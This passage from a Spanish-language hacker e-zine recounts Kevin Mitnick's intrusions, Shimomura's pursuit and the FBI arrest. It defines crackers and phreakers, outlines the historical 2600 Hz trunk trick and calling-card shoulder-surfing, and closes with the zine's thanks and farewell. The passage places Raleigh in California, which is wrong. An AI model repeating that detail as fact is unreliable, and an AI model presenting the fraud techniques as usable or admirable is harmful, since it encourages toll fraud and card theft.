    concluyo  que  la  mejor  manera  de  no  ser  rastreado era utilizando 
    telefonos celulares.  De esta manera podria cometer sus fechorias y  no 
    estar  atado  a  ningun  lugar  fijo.   Para  ello  necesitaba  obtener 
    programas que le permitieran moverse con la misma facilidad con que  lo 
    hacia en la red telefonica.  

    Luego  de  varios  intentos  infructuosos,   en  cuanto  a  calidad  de 
    informacion,  se encontro con la computadora de  Tsutomu  Shimomura  la 
    cual  invadio  en  la Navidad de 1994.  Shimomura,  fisico computista y 
    experto en sistemas de seguridad del San  Diego  Supercomputer  Center, 
    era ademas un muy buen Hacker,  pero era de los "chicos buenos", ya que 
    cuando hallaba una falla de seguridad en algun sistema lo  reportaba  a 
    las autoridades, no a otros Hackers.  

    Shimomura  noto  que  alguien  habia  invadido  su  computadora  en  su 
    ausencia,  utilizando un metodo de intrusion muy sofisticado y  que  el 
    nunca  antes  habia  visto.  El  intruso  le  habia  robado  su  correo 
    electronico,  software para el control de telefonos celulares y  varias 
    herramientas de seguridad en Internet. Alli comenzo la cuenta regresiva 
    para  Mitnick.  Shimomura  se  propuso como orgullo personal atrapar al 
    Hacker que habia invadido su privacidad.  

    Hacia finales de enero de 1995, el software de Shimomura fue hallado en 
    una cuenta en The Well, un proveedor de Internet en California. Mitnick 
    habia creado  una  cuenta  fantasma  en  ese  proveedor  y  desde  alli 
    utilizaba  las  herramientas de Shimomura para lanzar ataques hacia una 
    docena de corporaciones de computadoras, entre ellas Motorola,  Apple y 
    Qualcomm.  

    Shimomura  se  reunio  con  el  gerente de The Well y con un tecnico de 
    Sprint (proveedor de servicios telefonicos  celulares)  y  descubrieron 
    que  Mitnick  habia  creado  un numero celular fantasma para accesar el 
    sistema.  Luego de dos  semanas  de  rastreos  determ  inaron  que  las 
    llamadas provenian de Raleigh, California.  

    Al  llegar  Shimomura  a  Raleigh  recibio  una  llamada del experto en 
    seguridad de  InterNex,  otro  proveedor  de  Internet  en  California. 
    Mitnick  habia  invadido otra vez el sistema de InterNex,  habia creado 
    una cuenta de nombre Nancy,  borrado una con  el  nombre  Bob  y  habia 
    cambiado  varias claves de seguridad incluyendo la del experto y la del 
    gerente del sistema que posee  los  privilegios  mas  altos.  De  igual 
    manera  Shimomura  tenia  informacion  sobre  la invasion de Mitcnick a 
    Netcom, una red de base de datos de noticias.  

    Shimomura se comunico con el FBI y estos enviaron a un grupo de rastreo 
    por radio. El equipo de rastreo poseia un simulador de celda, un equipo 
    normalmente utilizado para probar telefonos celulares  pero  modificado 
    para  rastrear  el  telefono  de Mitnick mientras este esta encendido y 
    aunque no este en uso. Con este aparato el celular se convertiria en un 
    transmisor sin que el usuario lo supiera.  

    A medianoche terminaron de colocar los equipos en una Van y comenzo  la 
    busqueda  de  la  se¤al,  porque  eso era lo que querian localizar;  no 
    buscaban a un hombre porque todas las fotos que tenian eran viejas y no 
    estaban seguros de su aspecto actual,  el objetivo  de  esa  noche  era 
    determinar  el  lugar de procedencia de la se¤al.  Ya para la madrugada 
    localizaron la se¤al en un  grupo  de  apartamentos  pero  no  pudieron 
    determinar en cual debido a interferencias en la se¤al.  

    Mientras  esto ocurria la gente de InterNex,  The Well y Netcom estaban 
    preocupados por los movimientos que casi simultaneamente Mitnick  hacia 
    en  cada uno de estos sistemas.  Cambiaba claves de acceso que el mismo 
    habia creado y que tenian menos de  12  horas  de  creadas,  utilizando 
    codigos  extra¤os e ironicos como no,panix,  fukhood y fuckjkt.  Estaba 
    creando nuevas  cuentas  con  mayores  niveles  de  seguridad  como  si 
    sospechara que lo estaban vigilando.  

    El  FBI,  Shimomura  y  el  equipo  de  Sprint  se  habian reunido para 
    planificar  la  captura.  Shimomura  envio  un  mensaje  codificado  al 
    buscapersonas del encargado en Netcom para advertirle que el arresto se 
    iba  a  realizar  al dia siguiente,  16 de Febrero.  Shimomura envio el 
    mensaje varias veces por equivocacion y  el  encargado  interpreto  que 
    Mitnick  ya  habia sido arrestado adelantandose a realizar una copia de 
    respaldo de todo el material que Mitnick  habia  almacenado  en  Netcom 
    como evidencia y borrando las versiones almacenadas por Mitnick.  Habia 
    que realizar el arresto de inmediato,  antes de que  Mitnick  se  diera 
    cuenta de que su informacion habia sido borrada.  

    Cuando  faltaban  minutos  para  dar  la  orden  el simulador de celdas 
    detecto  una  nueva  se¤al  de  transmision  de  datos  via  celular  y 
    simultanea a la de Mitnick, muy cerca de esa zona.  Algo extra¤o estaba 
    haciendo   Mitnick  con  las  lineas  celulares,   Shimomura  trato  de 
    advertirle al agente del FBI pero ya todo estaba  en  manos  de  ellos, 
    Shimomura   de   ahora  en  adelante  no  era  mas  que  un  espectador 
    privilegiado.  El FBI no pensaban hacer una entrada violenta porque  no 
    creian que Mitnick estuviera armado,  pero tenian que actuar muy rapido 
    porque sabian el da¤o que este hombre podia causar en  un  solo  minuto 
    con  una  computadora.  Se  acercaron  lentamente  hasta la entrada del 
    apartamento de Mitnick y anunciaron su presencia,  si no les abrian  la 
    puerta en cinco segundos la echarian abajo. Mitnick abrio la puerta con 
    toda  calma  y  el  FBI  procedio  a  arrestarlo  y a decomisar todo el 
    material pertinente discos, computador, telefonos celulares,  manuales, 
    etc.  

    De  regreso  a  su  hotel  Shimomura  decide  chequear  la contestadora 
    telefonica de su residencia en San Diego.  Se quedo en una pieza cuando 
    escucho  la  voz  de  Mitnick quien le habia dejado varios mensajes con 
    acento oriental en tono de burla.  El ultimo de estos mensajes lo habia 
    recibido ocho horas despues de que Mitnick habia sido arrestado y antes 
    de que la prensa se hubiera enterado de todo el asunto. Como se realizo 
    esa  llamada aun es un misterio al igual que el origen y objetivo de la 
    segunda se¤al de Mitnick.  

    Este persistente hacker actualmente esta siendo juzgado y enfrenta  dos 
    cargos  federales,  uso ilegal de equipos de acceso telefonico y fraude 
    por computadoras.  Puede ser condenado por hasta 35 a¤os y a pagar  una 
    multa  de hasta medio millon de dolares.  Mitnick tambien es sospechoso 
    de robar el software que las compa¤ias telefonicas  piensan  usar  para 
    todo  tipo  de procesos,  desde la facturacion hasta el seguimiento del 
    origen de una llamada pasando por la decodificacion de las  se¤ales  de 
    los telefonos celulares para preservar su privacidad.  




    El vuelo final


    Todos  los cargos bajo los cuales ha sido acusado Kevin Mitnick podrian 
    suponerle mas de doscientos a¤os de prision si es  declarado  culpable. 
    "No culpable" alcanzo a declararse Kevin Mitnick ante el Gran Jurado de 
    California,  que  el  pasado 30 de septiembre lo acuso de 25 cargos por 
    los cuales podria ser condenado a mas de doscientos a¤os de presidio.  

    "Esta acusacion revela el amplio da¤o que Mitnick causo mientras era un 
    fugitivo de  la  justicia.  Los  delitos  por  computadora  permiten  a 
    sofisticados criminales causar estragos alrededor del mundo usando solo 
    una computadora y un modem como sus armas.  Queremos con esta acusacion 
    dar un paso  adelante  en  los  esfuerzos  federales  por  perseguir  y 
    capturar  a  los  hackers"  dijo  la  fiscal  encargada del caso,  Nora 
    Manella.  Los cargos por los que fue  acusado  Mitnick  y  su  ayudante 
    Lewis  Depayne,  de  36  a¤os,  incluyen  el  robo de software,  fraude 
    electronico,  da¤o a las computadoras de  la  Universidad  del  Sur  de 
    California, robo de archivos electronicos e intercepcion de mensajes de 
    correo  electronico.  Entre las compa¤ias afectadas por las actividades 
    del llamado "Condor" se cuentan Motorola, Nokia, Fujitsu y Nec.  

    Se supone que los da¤os causados por Mitnick en los dos  a¤os  y  medio 
    durante   los  cuales  fue  un  fugitivo  suman  millones  de  dolares, 
    especialmente por el software robado y  las  inversiones  que  debieron 
    realizar  las  empresas  para  proteger sus sistemas.  El asistente del 
    fiscal David Schindler dijo que Mitnick  -quien  actualmente  tiene  33 
    a¤os-  seria probablemente sentenciado a "muchos a¤os" si es encontrado 
    culpable,  negandose,  sin embargo,  a  ser  mas  especifico,  bajo  el 
    argumento de que se trata de un area legal muy nueva.  Todos los cargos 
    bajo  los  cuales  ha  sido  acusado  Mitnick  podrian suponerle mas de 
    doscientos a¤os de prision si es declarado culpable de todos ellos.  

    Ya en abril de este a¤o el famoso hacker habia sido declarado  culpable 
    por  un  jurado  de Carolina del Norte por el uso del quince numeros de 
    telefonos celulares robados para llamar a bases de datos  electronicas. 
    Igualmente  se  le  condeno  por  haber  violado el regimen de libertad 
    condicional al que estaba sometido luego de ser encontrado culpable  de 
    penetrar  ilegalmente  en  sistemas  de informacion de corporaciones de 
    informatica.  

    Mitnick: hacker, cracker y phone phreaker
  
    La definicion de un cracker es alguien que trata de violar el acceso  a 
    un  sistema  adquiriendo  passwords.  La  mayoria  de  los crackers son 
    adolescentes nada bondadosos y que buscan dar sus golpes destruyendo  o 
    alterando  la  data  de  un  sistema.  Tienden  a  unirse en grupos muy 
    peque¤os,  secretos y cerrados al contrario de los inmensos,  abierto y 
    policulturales hackers.  

    Se  espera  que  un  verdadero  hacker  haga algo de crackin jugueton y 
    conozca muchas de las tecnicas basicas,  pero cualquiera que pase de la 
    etapa  de  larva  puede  caer en la tentacion y,  debido a su creciente 
    deseo de realizar algo por razones inmediatas, benignas y practicas, no 
    vea nada de malo en invadir cierta seguridad y  privacidad  para  poder 
    lograr una meta.  

    Para  el  cracker  el  invadir  un  sistema  no requiere de misteriosos 
    estados  de  iluminacion  mental,  pero  si  mucha  persistencia  y  la 
    testaruda  repeticion de trucos bien conocidos en los puntos debiles de 
    un sistema,  tratan de descubrir informacion  clasificada  hurgando  al 
    azar y con ciega persistencia.  

    Suele  decirse  que  los  crackers  son solo hackers mediocres y que su 
    nivel de educacion e inteligencia sobre un sistema es menor.  

    Los phone phreaker son los mas famosos en los  medios  de  comunicacion 
    por los desastres que han hecho a traves de los a¤os. En los a¤os 60 ya 
    existian  los  Phone Phreaks y la gran victima era ATT.  Uno de los mas 
    famosos Phone Phreaks de esa  epoca  era  John  Draper,  alias  Captain 
    Crunch  (http://www.fc.net/phrack.html).  El  descubrio que modificando 
    una caja de cereal podia producir el silbido que simulaba  un  tono  de 
    2600 Hz para desbloquear el acceso a una troncal y poder hacer llamadas 
    internacionales gratis.  

    Hace  algun tiempo el hacer phreaking fue una actividad semi-respetable 
    dentro de la comunidad hacker;  habia un acuerdo de caballeros donde el 
    hacer  phreaking era bien visto como juego intelectual y como una forma 
    de exploracion, pero el robo de servicios era tabu. La modernizacion de 
    las redes hizo necesario que los phreakers  utilizaran  tecnicas  menos 
    eticas,  como robar numeros de calling cards:  los obtenian colocandose 
    cerca de algun telefono publico y memorizando el numero de tarjeta  que 
    marcaba un usuario descuidado, una vez obtenido el numero y la clave la 
    informacion  era  esparcida  de tal manera que en un caso se llegaron a 
    realizar 600 llamadas internacionales en dos minutos antes de  que  los 
    operadores de seguridad del sistema la cancelaran.  


    Los lugares de "El Condor"

    En el Web

    The  Fugitive  Game.  El Juego del Fugitivo.  El usuario debe descubrir 
    cual de los indiciados es el verdadero hacker.  

    Takedown.  El "site" oficial de Tsutomu Shimomura,  el talon de Aquiles 
    de Mitnick. En Takedown se narra, paso a paso, la persecucion contra el 
    Condor hasta su captura. Incluye los archivos de sonido de los extra¤os 
    mensajes  que  Shimomura  recibio  luego  de  la  captura  de Mitcnick. 
    Curiosamente,  este site fue "hackeado" meses luego de aparecer  en  el 
    Web,  supuestamente  por  miembros de un grupo autodenominado Frente de 
    Liberacion Nacional,  el cual se supone formado por hackers capaces  de 
    penetrar en casi cualquier sistema.  



    Informacion general sobre Mitnick

    Mitnick.  Decenas  de  links  a  paginas  relacionadas con este notorio 
    experto.  

    Criminals?  Un extenso reportaje de la revista 2600 sobre las recientes 
    capturas de hackers en los Estados Unidos 

    Dedicado a uno de los mejores: Kevin Mitnick


    En Newsgroups

    alt.fan.kevin-mitnick Sobran las palabras
    alt.2600  Un grupo de discusion creado por la revista por excelencia de 
              los hackers: 2600 
 

    En e-mail

    La direccion de correo de Kevin Mitnick es kmitnick@2600.com




***********************
-----------------------
AGRADECIMIENTOS
-----------------------
                  SudHack
***********************

Bueno, por supuesto que agradecemos a todos los que nos han descargado y a todos los que 
llegaron a esta parte de la e-zine, antes de mandarla a la papelera jajaj.
Bueno. queria agradecer a:

DonGatø, que pertenece al clan de eXvølutiøn que nos contactamos y la verdad es muy buena 
persona, se jugó y nos mando algunos escritos. jaja

Keogh, quien no lo conoce, el webmaster de novahack, www.novahack.com 
Nos pusimos en contácto con el y también arreglamos algunas sobre algunos textos.

Y a otras personas que nos ayudan sin que nadie los sepa :| jeejejje
Amd-Hack, mtvolution a hispabyte (ya saben, lo que antes era prehackers.... sisis, aunque no lo
crean DeKiper nos contesto un mail a nosotros jajajja) 
Y a todos los que hacen posible esta e-zine ayudandonos, aportando ideas, textos, algunos script
y todo lo necesario. 

**********
----------
DESPEDIDA 
----------
     SudHack
**********

Mándanos tus mail´s con dudas, con regaños con pedidos o con lo que quieras, a la dirección
que ya sabes, no me la hagas repetir tantas veces. e-zine@sudhack.zzn.com

Recuerda que estamos para ayudarte y/o enseñarte, y no para mostrarte "lo poco" que sabemos sin
prestar ayuda.

Recuerda que para cualquier cosa tienes el foro, también recuerda que esos lugares son
para compartir cosas con los demás, pero no para andar peleando con los demás.
Además, te puedo asegurar que si entras a un chat de hacking, maltratando a los demás,
no creo que dures mucho XD

También recuerda, que nosotros siempre queremos recibir críticas, para siempre poder mejorar
la e-zine, pero también recuerda que nos gusta recibir estimulaciones para poder continuar con
nuestros proyectos ;)

Por último recuerda que estaremos totalmente contentos si te nos quieres unir, ya sabes como se
maneja esto, tu representas a tu país, o si no, eres, digamos, un secundario, con el verdadero
webmaster, pueden hacer la web a medias cada uno, eso después lo ven ustedes.

Bueno, por hoy ya es suficiente, me parece que por el primer número, tienes bastante.
Espero que esta e-zine sea lo que has estado esperando tan ansiosamente o mas.

NOS VEMOS.... ESPERO QUE NOS VUELVAS A DESCARGAR EN MARZO.... (si es que llegamos) :p

HASTA LUEGO


